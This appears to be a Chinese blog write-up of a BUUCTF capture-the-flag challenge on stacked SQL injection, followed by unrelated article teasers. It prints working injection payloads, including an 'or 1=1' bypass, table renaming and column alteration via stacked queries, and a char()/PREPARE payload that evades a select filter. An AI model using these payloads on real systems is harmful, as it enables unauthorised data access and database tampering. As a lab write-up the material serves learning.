buuctf_sql注入_随便注1

作者：zgshenxz_474 | 来源：互联网 | 2023-07-01 16:01

题目：随便注1出处：https:buuoj.cnchallenges知识点：1.堆叠注入题面：解题步骤：

题目&＃xff1a;随便注1

出处&＃xff1a;https://buuoj.cn/challenges

知识点&＃xff1a;
1.堆叠注入

题面&＃xff1a;
在这里插入图片描述
解题步骤&＃xff1a;
1.直接提交1&＃xff0c;返回了一个php数组形式的返回值&＃xff0c;说明有回显。

在这里插入图片描述
2.尝试使用 ‘、"、]、) 等闭合sql语句&＃xff0c;发现单引号引起报错&＃xff0c;

3.尝试万能密码‘ or 1&＃61;1#,根据回显内容&＃xff0c;发现flag不在当前所在的表中&＃xff0c;这说明需要利用注入语句切换当前所在的表。
在这里插入图片描述
4.首先查询所有的表名&＃xff0c;1’;desc tables;#; 发现当前库中存在两个表

5.分别查看两个表结构

1&＃39;;desc &＃96;1919810931114514&＃96;;# 1&＃39;;desc &＃96;words&＃96;;#

发现flag存在于表1919810931114514中
在这里插入图片描述

6.现在目标明确&＃xff0c;要查询表1919810931114514中的flag

1&＃39;;select * from &＃96;1919810931114514&＃96;;#

执行后发现存在过滤&＃xff0c;无法使用select。
在这里插入图片描述
7.到这一步为止可以有多种解法

&＃xff08;1&＃xff09;需要对查询语句进行猜解,猜测查询语句如下&＃xff1a;

select * from &＃96;words&＃96; where id &＃61; &＃39;$inject&＃39;;

或者

select id,data from &＃96;words&＃96; where id&＃61;&＃39;$inject&＃39;;

如此看来目前我们要查询1919810931114514表&＃xff0c;而目前可利用的select语句执行在words表&＃xff0c;且无法使用堆叠注入执行新的select语句&＃xff0c;这就陷入了死循环。

重新分析一下&＃xff0c;已有的select语句其实在本题中是可以多次执行的&＃xff0c;每次执行不影响表结构&＃xff0c;其功能是查询words表中的全部内容。所以我们如果能想办法利用一个堆叠注入将1919810931114514表中的内容转移到words中&＃xff0c;然后再使用一次万能密码&＃xff08;’or 1&＃61;1#&＃xff09;&＃xff0c;就可以得到flag。

复制语句大概长这样

insert into &＃96;words&＃96; select * from &＃96;1919810931114514&＃96;

不行insert肯定会被过滤掉&＃xff0c;换个思路&＃xff0c;其实我还可以把1919810931114514表名改了。

说搞就搞。

1&＃39;;rename table &＃96;words&＃96; to &＃96;meiyong&＃96;;rename table &＃96;1919810931114514&＃96; to &＃96;words&＃96;;#

在这里插入图片描述
搞砸了&＃xff0c;大概是没有加表名没有&＃96;&＃96;,再来一次&＃xff0c;返回结果提醒我&＃xff0c;1919810931114514中本身没有id列&＃xff0c;会翻车。

重置环境重来&＃xff0c;把flag列名改成id&＃xff0c;执行成功

1&＃39;;rename table &＃96;words&＃96; to &＃96;meiyong&＃96;;rename table &＃96;1919810931114514&＃96; to &＃96;words&＃96;;ALTER TABLE &＃96;words&＃96; CHANGE &＃96;flag&＃96; &＃96;id&＃96; VARCHAR(100) ;#

接着再执行万能密码

1‘or 1&＃61;1;

在这里插入图片描述

&＃xff08;2&＃xff09;利用char()方法&＃xff0c;还没做&＃xff0c;但是嫖来了payload&＃xff0c;感觉可以作为通法值得研究。payload如下&＃xff1a;

?inject&＃61;&＃39;;SET &＃64;sql&＃61;concat(char(115,101,108,101,99,116)," * from &＃96;1919810931114514&＃96;");PREPARE sqla from &＃64;sql;EXECUTE sqla;#

&＃xff08;3&＃xff09;利用预处理&＃xff0c;还没做&＃xff0c;什么都没做

总结&＃xff1a;由于短短说不写完就打死我&＃xff0c;所以本文暂时就烂尾了&＃xff0c;明天我把剩下的两种解法补全。

推荐阅读

char
MySQL中的MVVC多版本并发控制机制的应用及实现

本文介绍了MySQL中MVCC的应用及实现机制。MVCC是一种提高并发性能的技术，通过对事务内读取的内存进行处理，避免写操作堵塞读操作的并发问题。与其他数据库系统的MVCC实现机制不尽相同，MySQL的MVCC是在undolog中实现的。通过undolog可以找回数据的历史版本，提供给用户读取或在回滚时覆盖数据页上的数据。MySQL的大多数事务型存储引擎都实现了MVCC，但各自的实现机制有所不同。 ... [详细]

蜡笔小新 2023-12-11 13:09:19
replace
Java String与StringBuffer的区别及其应用场景

本文主要介绍了Java中String和StringBuffer的区别，String是不可变的，而StringBuffer是可变的。StringBuffer在进行字符串处理时不生成新的对象，内存使用上要优于String类。因此，在需要频繁对字符串进行修改的情况下，使用StringBuffer更加适合。同时，文章还介绍了String和StringBuffer的应用场景。 ... [详细]

蜡笔小新 2023-12-13 19:21:06
replace
ASP.NET Tips: 获取插入记录的ID的方法详解

本文详细介绍了在ASP.NET中获取插入记录的ID的几种方法，包括使用SCOPE_IDENTITY()和IDENT_CURRENT()函数，以及通过ExecuteReader方法执行SQL语句获取ID的步骤。同时，还提供了使用这些方法的示例代码和注意事项。对于需要获取表中最后一个插入操作所产生的ID或马上使用刚插入的新记录ID的开发者来说，本文提供了一些有用的技巧和建议。 ... [详细]

蜡笔小新 2023-12-13 17:03:18
replace
如何在php中将mysql查询结果赋值给变量

本文介绍了在php中将mysql查询结果赋值给变量的方法，包括从mysql表中查询count(学号)并赋值给一个变量，以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法，并提供了示例代码。 ... [详细]

蜡笔小新 2023-12-12 18:22:57
object
Java学习笔记之使用反射+泛型构建通用DAO

本文介绍了使用反射和泛型构建通用DAO的方法，通过减少代码冗余度来提高开发效率。通过示例说明了如何使用反射和泛型来实现对不同表的相同操作，从而避免重复编写相似的代码。该方法可以在Java学习中起到较大的帮助作用。 ... [详细]

蜡笔小新 2023-12-11 18:38:04
byte
Oracle 11g物理Active Data Guard实时查询（Realtime query）特性

在Oracle11g以前版本中的的DataGuard物理备用数据库，可以以只读的方式打开数据库，但此时MediaRecovery利用日志进行数据同步的过 ... [详细]

蜡笔小新 2023-12-11 15:49:10
byte
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
byte
Android 新闻App的本地服务器搭建教程

本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]

蜡笔小新 2023-12-14 17:15:19
byte
PHP中的MySQL函数库及其常用函数介绍

本文由编程笔记小编整理，介绍了PHP中的MySQL函数库及其常用函数，包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-14 08:19:53
range
Oracle分析函数first_value()和last_value()的用法及原理

本文介绍了Oracle分析函数first_value()和last_value()的用法和原理，以及在查询销售记录日期和部门中的应用。通过示例和解释，详细说明了first_value()和last_value()的功能和不同之处。同时，对于last_value()的结果出现不一样的情况进行了解释，并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]

蜡笔小新 2023-12-13 19:07:23
object
SpringJdbcTemplate的使用详解

本文详细介绍了Spring的JdbcTemplate的使用方法，包括执行存储过程、存储函数的call()方法，执行任何SQL语句的execute()方法，单个更新和批量更新的update()和batchUpdate()方法，以及单查和列表查询的query()和queryForXXX()方法。提供了经过测试的API供使用。 ... [详细]

蜡笔小新 2023-12-13 14:27:11
jsp
高质量SQL书写的30条建议

本文提供了30条关于优化SQL的建议，包括避免使用select *，使用具体字段，以及使用limit 1等。这些建议是基于实际开发经验总结出来的，旨在帮助读者优化SQL查询。 ... [详细]

蜡笔小新 2023-12-13 13:24:33
jsp
MyBatis多表查询与动态SQL使用

本文介绍了MyBatis多表查询与动态SQL的使用方法，包括一对一查询和一对多查询。同时还介绍了动态SQL的使用，包括if标签、trim标签、where标签、set标签和foreach标签的用法。文章还提供了相关的配置信息和示例代码。 ... [详细]

蜡笔小新 2023-12-12 17:12:51
byte
android studio生成jks,android studio生成 keystore 以及获取 SHA1值等

合并列值－合并为一列问题需求：createtabletab(Aint,Bint,Cint)inserttabselect1,2,3unionallsel ... [详细]

蜡笔小新 2023-12-11 12:32:55
object
如何在Laravel DB :: insert中返回OUTPUT子句的值？

本文介绍了在使用Laravel和sqlsrv连接到SQL Server 2016时，如何在插入查询中使用输出子句，并返回所需的值。同时讨论了使用CreatedOn字段返回最近创建的行的解决方法以及使用Eloquent模型创建后，值正确插入数据库但没有返回uniqueidentifier字段的问题。最后给出了一个示例代码。 ... [详细]

蜡笔小新 2023-12-11 10:09:09

zgshenxz_474

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章